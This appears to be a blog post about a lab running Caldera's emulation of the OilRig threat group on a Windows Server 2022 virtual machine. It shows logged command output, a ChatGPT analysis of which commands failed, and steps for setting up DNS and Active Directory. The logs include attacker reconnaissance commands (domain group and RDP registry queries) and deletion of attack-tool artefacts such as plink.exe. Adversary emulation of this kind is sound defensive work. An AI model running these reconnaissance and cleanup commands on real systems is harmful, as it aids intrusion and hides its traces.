0x0SERVICE_NAME: ElasticEndpointDISPLAY_NAME: Elastic Endpoint TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: EventLogDISPLAY_NAME: Windows Event Log TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: EventSystemDISPLAY_NAME: COM+ Event System TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: fdPHostDISPLAY_NAME: Function Discovery Provider Host TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: FDResPubDISPLAY_NAME: Function Discovery Resource Publication TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: FontCacheDISPLAY_NAME: Windows Font Cache Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: gpsvcDISPLAY_NAME: Group Policy Client TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: IKEEXTDISPLAY_NAME: IKE and AuthIP IPsec Keying Modules TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: iphlpsvcDISPLAY_NAME: IP Helper TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: KeyIsoDISPLAY_NAME: CNG Key Isolation TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: LanmanServerDISPLAY_NAME: Server TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: LanmanWorkstationDISPLAY_NAME: Workstation TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: lmhostsDISPLAY_NAME: TCP/IP NetBIOS Helper TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: LSMDISPLAY_NAME: Local Session Manager TYPE : 30 WIN32 STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: mpssvcDISPLAY_NAME: Windows Defender Firewall TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: MSDTCDISPLAY_NAME: Distributed Transaction Coordinator TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: NcbServiceDISPLAY_NAME: Network Connection Broker TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: netprofmDISPLAY_NAME: Network List Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: NlaSvcDISPLAY_NAME: Network Location Awareness TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: nsiDISPLAY_NAME: Network Store Interface Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: PcaSvcDISPLAY_NAME: Program Compatibility Assistant Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: PlugPlayDISPLAY_NAME: Plug and Play TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: PolicyAgentDISPLAY_NAME: IPsec Policy Agent TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: PowerDISPLAY_NAME: Power TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: ProfSvcDISPLAY_NAME: User Profile Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: RasManDISPLAY_NAME: Remote Access Connection Manager TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: RpcEptMapperDISPLAY_NAME: RPC Endpoint Mapper TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: RpcSsDISPLAY_NAME: Remote Procedure Call (RPC) TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: SamSsDISPLAY_NAME: Security Accounts Manager TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: ScheduleDISPLAY_NAME: Task Scheduler TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: SENSDISPLAY_NAME: System Event Notification Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: ShellHWDetectionDISPLAY_NAME: Shell Hardware Detection TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: SpoolerDISPLAY_NAME: Print Spooler TYPE : 110 WIN32_OWN_PROCESS (interactive) STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: sshdDISPLAY_NAME: OpenSSH SSH Server TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: SstpSvcDISPLAY_NAME: Secure Socket Tunneling Protocol Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: StateRepositoryDISPLAY_NAME: State Repository Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: StorSvcDISPLAY_NAME: Storage Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: SysMainDISPLAY_NAME: SysMain TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: Sysmon64DISPLAY_NAME: Sysmon64 TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: SystemEventsBrokerDISPLAY_NAME: System Events Broker TYPE : 20 WIN32_SHARE_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: TabletInputServiceDISPLAY_NAME: Touch Keyboard and Handwriting Panel Service TYPE : 30 WIN32 STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: ThemesDISPLAY_NAME: Themes TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: TimeBrokerSvcDISPLAY_NAME: Time Broker TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: TokenBrokerDISPLAY_NAME: Web Account Manager TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: TrkWksDISPLAY_NAME: Distributed Link Tracking Client TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: UALSVCDISPLAY_NAME: User Access Logging Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: UserManagerDISPLAY_NAME: User Manager TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: UsoSvcDISPLAY_NAME: Update Orchestrator Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: VBoxServiceDISPLAY_NAME: VirtualBox Guest Additions Service TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: W32TimeDISPLAY_NAME: Windows Time TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WcmsvcDISPLAY_NAME: Windows Connection Manager TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WinDefendDISPLAY_NAME: Microsoft Defender Antivirus Service TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WinHttpAutoProxySvcDISPLAY_NAME: WinHTTP Web Proxy Auto-Discovery Service TYPE : 30 WIN32 STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WinmgmtDISPLAY_NAME: Windows Management Instrumentation TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WinRMDISPLAY_NAME: Windows Remote Management (WS-Management) TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WLMSDISPLAY_NAME: Windows Licensing Monitoring Service TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WpnServiceDISPLAY_NAME: Windows Push Notifications System Service TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: wuauservDISPLAY_NAME: Windows Update TYPE : 30 WIN32 STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: cbdhsvc_97674DISPLAY_NAME: Clipboard User Service_97674 TYPE : f0 ERROR STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: CDPUserSvc_97674DISPLAY_NAME: Connected Devices Platform User Service_97674 TYPE : f0 ERROR STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0SERVICE_NAME: WpnUserService_97674DISPLAY_NAME: Windows Push Notifications User Service_97674 TYPE : f0 ERROR STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
stderr:
exit code: 0
command: systeminfo
stdout: Host Name: WINDOWS-SERVEROS Name: Microsoft Windows Server 2022 Standard EvaluationOS Version: 10.0.20348 N/A Build 20348OS Manufacturer: Microsoft CorporationOS Configuration: Standalone ServerOS Build Type: Multiprocessor FreeRegistered Owner: Windows UserRegistered Organization: Product ID: 00454-40000-00001-AA626Original Install Date: 10/15/2024, 2:49:41 AMSystem Boot Time: 11/11/2024, 8:07:32 PMSystem Manufacturer: innotek GmbHSystem Model: VirtualBoxSystem Type: x64-based PCProcessor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 158 Stepping 10 GenuineIntel ~3549 MhzBIOS Version: innotek GmbH VirtualBox, 12/1/2006Windows Directory: C:\WindowsSystem Directory: C:\Windows\system32Boot Device: \Device\HarddiskVolume1System Locale: en-us;English (United States)Input Locale: en-us;English (United States)Time Zone: (UTC+09:00) SeoulTotal Physical Memory: 6,144 MBAvailable Physical Memory: 3,200 MBVirtual Memory: Max Size: 7,168 MBVirtual Memory: Available: 3,840 MBVirtual Memory: In Use: 3,328 MBPage File Location(s): C:\pagefile.sysDomain: WORKGROUPLogon Server: \\WINDOWS-SERVERHotfix(s): 3 Hotfix(s) Installed. [01]: KB5008882 [02]: KB5011497 [03]: KB5010523Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Ethernet DHCP Enabled: No IP address(es) [01]: 192.168.1.21 [02]: fe80::5588:53e8:2e27:9e65Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
stderr:
exit code: 0
command: reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
stdout:
stderr: ERROR: The system was unable to find the specified registry key or value.
exit code: 1
command: net group "SQL Admins" /domain
stdout: The request will be processed at a domain controller for domain WORKGROUP.
stderr: System error 1355 has occurred.The specified domain either does not exist or could not be contacted.
exit code: 2
command: del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe;
stdout:
stderr: The system cannot find the path specified.
exit code: 1
ChatGPT Recommendations to enable command execution
Prompt:
The attached file contains all the commands executed by the adversary "OilRig" in an operation in the caldera framework. It contains command, stdout, stderr, and exit_code. I am pretty sure you will be able to deduce which commands where successful and which were not. I also need your suggestions of what to do in the windows server 2022, where this sandcat agent is installed, to be able to run successfully all the commands.
Answer:
Based on the command results from the oilrig_windows_commands.txt, I can identify successful and failed command executions, along with recommendations for adjustments in your Windows Server 2022 environment to help ensure all commands execute correctly. Here’s an analysis and troubleshooting plan:
- Successful Commands:
Basic System and Network Information:
Commands like
cscript /nologo computername.vbs,hostname,whoami,ipconfig /all, andsysteminfosuccessfully gathered system information.Access to User and Local Group Info: Commands
net userandnet localgroup administratorsworked correctly, showing local users and admin groups.
Process and Service Listing:
- The
tasklistandsc querycommands ran successfully, displaying active processes and services.
- The
- Failed Commands and Recommendations:
Domain-Specific Commands:
Commands targeting domain accounts, such as
net user /domain,net group /domain,net group "domain admins" /domain,net group "Exchange Trusted Subsystem" /domain, andnet accounts /domain, failed with a System error 1355.Reason: This error typically indicates the system is not part of a Windows domain but rather configured as a standalone server in a WORKGROUP.
Recommendation: If domain functionality is necessary for these commands, the Windows Server 2022 machine should be joined to an Active Directory (AD) domain. Otherwise, these commands will continue to fail because they rely on domain-specific account and group data that’s unavailable in a WORKGROUP configuration.
Registry Query:
The command
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"failed with ERROR: The system was unable to find the specified registry key or value.Reason: This error occurs when the specified registry key doesn’t exist, which may be due to the absence of remote desktop connections or saved configurations under that registry path.
Recommendation: Verify if remote desktop or terminal services configurations are saved in the registry. If not, this command will not yield results as expected.
File Deletion:
The command
del C:\Users\gosta\AppData\Roaming\fsociety.dat C:\Users\Public\Downloads\plink.exe; failed, showing The system cannot find the path specified.Reason: This error likely means the specified files, fsociety.dat and plink.exe, do not exist in the specified paths.
Recommendation: Verify if these files were created or downloaded by prior actions. If they are not required for other steps, this deletion command might be unnecessary. Alternatively, check paths and filenames for accuracy.
Domain Group Check for “SQL Admins”:
The
net group "SQL Admins" /domaincommand failed similarly due to System error 1355, as the machine isn’t joined to a domain.Recommendation: This command requires domain membership. Without domain membership, this query can’t return valid results, so it should be omitted unless the machine is added to a domain.
- Summary of Steps to Improve Command Execution
Join to an Active Directory Domain (if required): Ensure the server is connected to a domain to support domain-specific commands. Alternatively, if domain-related reconnaissance isn’t necessary, you can exclude these commands.
Verify File Existence and Paths: Before executing deletion commands, ensure the files exist. You can add conditional checks in scripts to avoid errors when files aren’t present.
Review Registry Keys and Remote Desktop Configuration: If remote desktop-related keys are required, configure or use RDP sessions that populate these keys. Otherwise, accept that registry queries related to these settings will not yield data.
Corrective Measures
Joining the server to an Active Diretory Domain
Install the DNS Server Role
1. Open Server Manager:
- Click Start and open Server Manager (it usually opens by default on startup).
2. Add Roles and Features:
- In Server Manager, click Manage in the top right, then select Add Roles and Features.
3. Begin the Installation Wizard:
- Click Next on the Before You Begin page.
- Choose Role-based or feature-based installation and click Next.
4. Select the Server:
- Select your local server from the list and click Next.
5. Choose DNS Server:
- In the Roles list, check the box for DNS Server.
- Click Add Features when prompted to add any required features, then click Next.
6. Add Any Necessary Features:
- Click Next to bypass the Features page, as no additional features are required for a DNS Server setup.
7. Confirm and Install:
- Review your selections and click Install.
- Wait for the installation to complete, and then click Close when done.
Configure DNS to Support the AD DS Domain
After the DNS role is installed, you’ll need to set up a Forward Lookup Zone to support AD DS.
1. Open DNS Manager:
- In Server Manager, go to Tools > DNS to open the DNS Manager console.
2. Create a Forward Lookup Zone:
- In DNS Manager, right-click on Forward Lookup Zones and select New Zone.
- This will open the New Zone Wizard. Click Next.
3. Configure Zone Settings:
Zone Type: Select Primary Zone and ensure the box for Store the zone in Active Directory is checked (this option appears if AD DS has already been installed).
Replication Scope: Choose To all DNS servers in this domain.
Zone Name: Enter the domain name you intend to use for your AD DS domain (e.g., example.com). Click Next.
4. Dynamic Updates:
Enable Allow only secure dynamic updates to ensure that only authorized clients can update DNS records.
Click Next and then Finish to complete the zone creation.
5. Confirm DNS Zone Creation:
- You should now see the new forward lookup zone (e.g., example.com) under Forward Lookup Zones in DNS Manager.
6. Set DNS Server IP in Network Settings:
- To ensure the server can resolve its own domain records, configure its network adapter to use its own IP address as the Preferred DNS Server.
- Go to Settings > Network & Internet > Ethernet > Change adapter options.
- Right-click your network connection and select Properties.
- Select Internet Protocol Version 4 (TCP/IPv4), click Properties, and set the Preferred DNS server to the server’s own IP address.
DNS Server Role features
- .NET Framework 4.8 Features (2 of 7 installed).
- Microsoft Defender Defender (installed)
- Remote Server Administration Tools (NOT INSTALLED)
- System Data Archiver (installed)
- Windows Powershell (installed WPS 5.1)
- WoW64 Support (installed)
- XPS Viewer (installed)
Install the Active Directory Domain Services (AD DS) Role
Open Server Manager:
- Click on Start and select Server Manager (it usually opens automatically on startup).
Add Roles and Features:
- In Server Manager, click on Manage in the top right, then choose Add Roles and Features.
Begin the Installation Wizard:
- Click Next through the Before You Begin screen.
- Choose Role-based or feature-based installation and click Next.
Select the Server:
- Select the local server you are configuring and click Next.
Select Server Roles:
- In the Roles section, check the box for Active Directory Domain Services.
- Click Add Features when prompted to add any required features, then click Next.
Add Necessary Features:
- In the Features section, the necessary components for AD DS should already be selected. Click Next.
Confirm and Install:
- Review your selections and click Install.
- Wait for the installation to complete, but do not close the wizard as you will proceed with the AD DS configuration after installation.
Creating Organizational Unit Groups
- We create the following groups:
- “Exchange Trusted Subsystem”
- “SQL Admins”
SECURITY KNOWLEDGE
- There is an option Allow only secure dynamic updates to ensure that only authorized clients can update DNS records.
Some Paths where AD DS is deploying its database, log files, and
SYSVOLfolder:- C:\Windows\NTDS
- C:\Windows\SYSVOL
This post is licensed under CC BY 4.0 by the author.